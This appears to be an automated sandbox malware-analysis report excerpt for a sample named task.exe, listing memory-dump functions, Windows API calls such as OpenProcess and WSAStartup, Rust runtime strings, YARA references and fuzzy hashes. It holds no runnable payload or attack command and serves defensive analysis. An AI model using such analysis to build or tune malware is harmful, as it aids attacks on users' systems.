                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: f27e11fe35099a377df240435709af6c1e6a391667d0ee268f0eb341694a4cda
                                                                                                                                                                • Instruction ID: ba032f33f10a0aef94e7c7195f683750c7f0d501db478986d80cc80f8656ece0
                                                                                                                                                                • Opcode Fuzzy Hash: f27e11fe35099a377df240435709af6c1e6a391667d0ee268f0eb341694a4cda
                                                                                                                                                                • Instruction Fuzzy Hash: 0E41D232A102149FDF24DF78C880A6EB7B6FF85714F1589A9D919EB380DB71E901CB84
                                                                                                                                                                Function 02587D05 Relevance: 7.6, APIs: 5, Instructions: 116COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: __dosmaperr$_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 242264518-0
                                                                                                                                                                • Opcode ID: f8ca5a62ddd23478255eddcf05197c87736945735625261dae81c3bc407dedda
                                                                                                                                                                • Instruction ID: e6f6b258c51f713c93eede09d789c568c3c3892176089733822c8b19be5212c1
                                                                                                                                                                • Opcode Fuzzy Hash: f8ca5a62ddd23478255eddcf05197c87736945735625261dae81c3bc407dedda
                                                                                                                                                                • Instruction Fuzzy Hash: 6731A07640451AAFDF11BFB4DC449AFBF69FF49324F200559F8106A190EB728910CBA5
                                                                                                                                                                Function 000AB25E Relevance: 7.6, APIs: 5, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,0008B9D1,?,?,?,00000001,?,?,00000001,0008B9D1,0008B9D1), ref: 000AB2AB
                                                                                                                                                                • __alloca_probe_16.LIBCMT ref: 000AB2E3
                                                                                                                                                                • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,0008B9D1,?,?,?,00000001,?,?,00000001,0008B9D1,0008B9D1,?), ref: 000AB334
                                                                                                                                                                • GetStringTypeW.KERNEL32(00000001,00000000,00000000,00000001,?,?,?,00000001,?,?,00000001,0008B9D1,0008B9D1,?,00000002,?), ref: 000AB346
                                                                                                                                                                • __freea.LIBCMT ref: 000AB34F
                                                                                                                                                                  • Part of subcall function 000A15B8: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,000A161B,00000001,00000000,?,000AAA99,00000001,00000004,00000000,00000001,?,?,000A0938), ref: 000A15EA
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharMultiWide$AllocateHeapStringType__alloca_probe_16__freea
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 313313983-0
                                                                                                                                                                • Opcode ID: 8238eee1f69c49873f04d97ef198b63dabfa7fed1501ad624837b501ffc89cf0
                                                                                                                                                                • Instruction ID: 996af39ab4d6f901a9d4ac6d73e81c35c12d58ef714214a6e48dc05178a4ecce
                                                                                                                                                                • Opcode Fuzzy Hash: 8238eee1f69c49873f04d97ef198b63dabfa7fed1501ad624837b501ffc89cf0
                                                                                                                                                                • Instruction Fuzzy Hash: 05319F72A0021AABDF259FA5DC45EEE7BA5EF41710F154228F80496152EB35CE50CBA0
                                                                                                                                                                Function 10007153 Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 1000715C
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 1000717F
                                                                                                                                                                  • Part of subcall function 100056D0: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 10005702
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 100071A5
                                                                                                                                                                • _free.LIBCMT ref: 100071B8
                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 100071C7
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                • Opcode ID: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                • Instruction ID: fdf90bdbf822fabaf3dd9d310e80898d5fc59248e37e3ebe61ec6e18e74c85b1
                                                                                                                                                                • Opcode Fuzzy Hash: dbf9df5b4a4e45fd59d7b0ba6c08b1d97dee470f846bf8241c04808ce4e83989
                                                                                                                                                                • Instruction Fuzzy Hash: 6601D872A01225BB73129BBE5C8CDBF2A6DFBC69E0311012AFD0CC7288DB658C0181B0
                                                                                                                                                                Function 000AA2CA Relevance: 7.6, APIs: 5, Instructions: 68COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetEnvironmentStringsW.KERNEL32 ref: 000AA2D3
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 000AA2F6
                                                                                                                                                                  • Part of subcall function 000A15B8: RtlAllocateHeap.NTDLL(00000000,00000001,00000004,?,000A161B,00000001,00000000,?,000AAA99,00000001,00000004,00000000,00000001,?,?,000A0938), ref: 000A15EA
                                                                                                                                                                • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000), ref: 000AA31C
                                                                                                                                                                • _free.LIBCMT ref: 000AA32F
                                                                                                                                                                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 000AA33E
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ByteCharEnvironmentMultiStringsWide$AllocateFreeHeap_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 336800556-0
                                                                                                                                                                • Opcode ID: d7829d7bc935bab265408d55f01bd10175184984b4598e74d5897caee7d41791
                                                                                                                                                                • Instruction ID: b7bb8f758c5f7ef561af453c6265a63a4c9afd12871ca8d5296e6e8112e76b08
                                                                                                                                                                • Opcode Fuzzy Hash: d7829d7bc935bab265408d55f01bd10175184984b4598e74d5897caee7d41791
                                                                                                                                                                • Instruction Fuzzy Hash: 4F01D4737052157B2B215AFA6C48CFF6AACDFC3FA03140229FC04D6281DB6A8E02C1B1
                                                                                                                                                                Function 02587826 Relevance: 7.6, APIs: 5, Instructions: 60COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 02587842
                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0258785B
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Value___vcrt_
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 1426506684-0
                                                                                                                                                                • Opcode ID: d45e0045578f3d3b4834c14696244e8225e228009244a765108eb1e39006c181
                                                                                                                                                                • Instruction ID: 4cdc235534bb1ab23e6df57fbf8d41c87f5fdf842732bb038eeecb39d6d1f891
                                                                                                                                                                • Opcode Fuzzy Hash: d45e0045578f3d3b4834c14696244e8225e228009244a765108eb1e39006c181
                                                                                                                                                                • Instruction Fuzzy Hash: F101B1362087236EFB143A75ACC5A3BAE56FB49774B30022AE418710E2FFD14C41D949
                                                                                                                                                                Function 10005B7A Relevance: 7.6, APIs: 5, Instructions: 53COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetLastError.KERNEL32(00000000,?,00000000,1000636D,10005713,00000000,?,10002249,?,?,10001D66,00000000,?,?,00000000), ref: 10005B7F
                                                                                                                                                                • _free.LIBCMT ref: 10005BB4
                                                                                                                                                                • _free.LIBCMT ref: 10005BDB
                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BE8
                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10005BF1
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: ErrorLast$_free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 3170660625-0
                                                                                                                                                                • Opcode ID: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                • Instruction ID: a404960836b3e2f032ab47abdd1028028b52a365ddf0c47563f665e512f3cffd
                                                                                                                                                                • Opcode Fuzzy Hash: 6445a1f563467e3e4669709244547b488691a64b9545451a4f80944232cffe94
                                                                                                                                                                • Instruction Fuzzy Hash: 5501F47A108A52A7F202E7345C85E1F3AAEDBC55F37220025FD19A615EEF73FD024164
                                                                                                                                                                Function 0007A36B Relevance: 7.5, APIs: 5, Instructions: 48COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • OpenProcess.KERNEL32(00001000,00000000,?,00000000,00000018,00000000), ref: 0007A383
                                                                                                                                                                • OpenProcess.KERNEL32(00000400,00000000,?,?,00000000,00000018,00000000), ref: 0007A396
                                                                                                                                                                • GetProcessImageFileNameW.PSAPI(00000000,?,00000104,?,00000000,00000018,00000000), ref: 0007A3B6
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000018,00000000), ref: 0007A3C1
                                                                                                                                                                • CloseHandle.KERNEL32(00000000,?,00000000,00000018,00000000), ref: 0007A3C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4483286396.0000000000061000.00000040.00001000.00020000.00000000.sdmp, Offset: 00060000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4482506668.0000000000060000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000B6000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D1000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4483545764.00000000000D5000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_60000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Process$CloseHandleOpen$FileImageName
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 2951400881-0
                                                                                                                                                                • Opcode ID: 389c1235f49b46090b55eb56237d1a1556f175cdb52c23985ab8feb6938e366b
                                                                                                                                                                • Instruction ID: fcd618b0c8ea5c1f611ed604d5b49e1352b759aea303d99c1ca96d4e82cad1c7
                                                                                                                                                                • Opcode Fuzzy Hash: 389c1235f49b46090b55eb56237d1a1556f175cdb52c23985ab8feb6938e366b
                                                                                                                                                                • Instruction Fuzzy Hash: 630199327002256BF71067948C49FFFB27CCBC1791F008226FA4DD2151EEBA8D000276
                                                                                                                                                                Function 10001E89 Relevance: 7.5, APIs: 5, Instructions: 41stringCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,?,?,?,100010DF,?,?,?,00000000), ref: 10001E9A
                                                                                                                                                                • lstrcatW.KERNEL32(?,?,?,100010DF,?,?,?,00000000), ref: 10001EAC
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EB3
                                                                                                                                                                • lstrlenW.KERNEL32(?,?,100010DF,?,?,?,00000000), ref: 10001EC8
                                                                                                                                                                • lstrcatW.KERNEL32(?,100010DF,?,100010DF,?,?,?,00000000), ref: 10001ED3
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: lstrlen$lstrcat
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 493641738-0
                                                                                                                                                                • Opcode ID: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                • Instruction ID: f5d9027fafc921fe84ae6627056796c55de3fa1ad923a59450c5185d8ca5453c
                                                                                                                                                                • Opcode Fuzzy Hash: 15c5d9995ac510f09c0b88b7baf044722e7f40351600db373de5a6e0e33856fc
                                                                                                                                                                • Instruction Fuzzy Hash: D8F082261002207AF621772AECC5FBF7B7CEFC6AA0F04001AFA0C83194DB54684292B5
                                                                                                                                                                Function 0259D3DC Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                • Opcode ID: 221f20c0a6ce461d3ac42c52f164b3dbbf6abf13dcd910ca69b46a51ad7fb88f
                                                                                                                                                                • Instruction ID: 309801f6e2150c40ee7c8666fc53e9dde1e47448e5dce4e5b742ddb0f1cbb858
                                                                                                                                                                • Opcode Fuzzy Hash: 221f20c0a6ce461d3ac42c52f164b3dbbf6abf13dcd910ca69b46a51ad7fb88f
                                                                                                                                                                • Instruction Fuzzy Hash: 0FF09632416762ABEF28FB68D5C0C2A77EBBA427657548815F01CDB500CF74FC805A5C
                                                                                                                                                                Function 100091B8 Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 100091D0
                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                • _free.LIBCMT ref: 100091E2
                                                                                                                                                                • _free.LIBCMT ref: 100091F4
                                                                                                                                                                • _free.LIBCMT ref: 10009206
                                                                                                                                                                • _free.LIBCMT ref: 10009218
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                • Opcode ID: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                • Instruction ID: a08e021c65853776c99c3fd86fadada58ae96d962e635c5153d22f52a77de1c5
                                                                                                                                                                • Opcode Fuzzy Hash: 531e654f2f11120a5df636ecca0a5618a09e043c7f3cd6e1a71cca3ab3857efc
                                                                                                                                                                • Instruction Fuzzy Hash: 77F06DB161C650ABE664DB58EAC6C4B7BEDFB003E13608805FC4DD7549CB31FC809A64
                                                                                                                                                                Function 10005351 Relevance: 7.5, APIs: 5, Instructions: 30COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • _free.LIBCMT ref: 1000536F
                                                                                                                                                                  • Part of subcall function 1000571E: HeapFree.KERNEL32(00000000,00000000,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?), ref: 10005734
                                                                                                                                                                  • Part of subcall function 1000571E: GetLastError.KERNEL32(?,?,1000924F,?,00000000,?,00000000,?,10009276,?,00000007,?,?,10007E5A,?,?), ref: 10005746
                                                                                                                                                                • _free.LIBCMT ref: 10005381
                                                                                                                                                                • _free.LIBCMT ref: 10005394
                                                                                                                                                                • _free.LIBCMT ref: 100053A5
                                                                                                                                                                • _free.LIBCMT ref: 100053B6
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                • String ID:
                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                • Opcode ID: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                • Instruction ID: ba906e9feca9bc6e71cd1aa5ebacb8f64a9f241ffe6b13fedf7f16c4e4854dfa
                                                                                                                                                                • Opcode Fuzzy Hash: 77e2762e1a20340d72e45a4044f221924c2ac7473818ed27067cb432955df604
                                                                                                                                                                • Instruction Fuzzy Hash: 38F0F478C18934EBF741DF28ADC140A3BB5F718A91342C15AFC1497279DB36D9429B84
                                                                                                                                                                Function 6FE72A80 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 303networkCOMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • WSAStartup.WS2_32(00000202,?), ref: 6FE72B38
                                                                                                                                                                Strings
                                                                                                                                                                • __rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...], xrefs: 6FE7996D
                                                                                                                                                                • s<unknown>, xrefs: 6FE797B0
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6FE797B5
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: Startup
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$__rust_begin_short_backtrace__rust_end_short_backtrace [... omitted frame ...]$s<unknown>
                                                                                                                                                                • API String ID: 724789610-600858821
                                                                                                                                                                • Opcode ID: fee5603c5615adb1270a1e0c1918671e9b62f53d50550f96012b196bcf769bef
                                                                                                                                                                • Instruction ID: 66e7db7ef9cd9736f883f1ca1f4beaf540d3a968f108f2c1e65b21b83a5ac00b
                                                                                                                                                                • Opcode Fuzzy Hash: fee5603c5615adb1270a1e0c1918671e9b62f53d50550f96012b196bcf769bef
                                                                                                                                                                • Instruction Fuzzy Hash: 88C15675D007089FDB21CF94C880B9EBFB5EF4A318F20815AE8586B395D775A942CBA1
                                                                                                                                                                Function 6FEA4F70 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 195COMMONLIBRARYCODE
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                Strings
                                                                                                                                                                • assertion failed: state_and_queue.addr() & STATE_MASK == RUNNINGlibrary\std\src\sys\sync\once\queue.rs, xrefs: 6FEA51F6
                                                                                                                                                                • use of std::thread::current() is not possible after the thread's local data has been destroyed, xrefs: 6FEA5194, 6FEA51A5
                                                                                                                                                                • ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs, xrefs: 6FEA51C9
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498212044.000000006FE41000.00000020.00000001.01000000.0000000B.sdmp, Offset: 6FE40000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4498154753.000000006FE40000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498290278.000000006FEA6000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498353235.000000006FEBD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498404459.000000006FEBE000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498464579.000000006FED3000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498516460.000000006FED5000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_6fe40000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID:
                                                                                                                                                                • String ID: ()/rustc/aa1c45908df252a5b0c14e1bcb38c6c55ae02efe\library\core\src\io\borrowed_buf.rs$assertion failed: state_and_queue.addr() & STATE_MASK == RUNNINGlibrary\std\src\sys\sync\once\queue.rs$use of std::thread::current() is not possible after the thread's local data has been destroyed
                                                                                                                                                                • API String ID: 0-1711242015
                                                                                                                                                                • Opcode ID: 784fbfba2ef15d8a2fd5e7c21b7dc9968e9be9b419495e360c66457932c56838
                                                                                                                                                                • Instruction ID: eadd255be8ca90d9ccbd9d9a10bdb06dbdcbf212eedbf3ad77cff19e1a5997b5
                                                                                                                                                                • Opcode Fuzzy Hash: 784fbfba2ef15d8a2fd5e7c21b7dc9968e9be9b419495e360c66457932c56838
                                                                                                                                                                • Instruction Fuzzy Hash: 73717C759017089FDB11DFA8D8407EEBFB5AF05328F24416AE865AF390DB72A901CBD1
                                                                                                                                                                Function 025990C4 Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 168COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4495447446.0000000002550000.00000040.00001000.00020000.00000000.sdmp, Offset: 02550000, based on PE: false
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_2550000_task.jbxd
                                                                                                                                                                Yara matches
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free_strpbrk
                                                                                                                                                                • String ID: *?$.
                                                                                                                                                                • API String ID: 3300345361-3972193922
                                                                                                                                                                • Opcode ID: 43bd902f0f36130778f4388e5d84a84ffd24785bc51953699fdf19ac985b95f9
                                                                                                                                                                • Instruction ID: eadb9f2e84c851d8f5a3a8a0c9d58eaa40935515b4723603077a150ce2c8af05
                                                                                                                                                                • Opcode Fuzzy Hash: 43bd902f0f36130778f4388e5d84a84ffd24785bc51953699fdf19ac985b95f9
                                                                                                                                                                • Instruction Fuzzy Hash: 89515D75E0020AAFDF14DFA9C880AADBBB9FF88314F24816ED855E7340E7759A019F54
                                                                                                                                                                Function 10004BDD Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 116COMMON
                                                                                                                                                                Download Yara Rule
                                                                                                                                                                APIs
                                                                                                                                                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\task.exe,00000104), ref: 10004C1D
                                                                                                                                                                • _free.LIBCMT ref: 10004CE8
                                                                                                                                                                • _free.LIBCMT ref: 10004CF2
                                                                                                                                                                Strings
                                                                                                                                                                Memory Dump Source
                                                                                                                                                                • Source File: 00000016.00000002.4498041205.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                • Associated: 00000016.00000002.4497988151.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                • Associated: 00000016.00000002.4498041205.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                • Snapshot File: hcaresult_22_2_10000000_task.jbxd
                                                                                                                                                                Similarity
                                                                                                                                                                • API ID: _free$FileModuleName
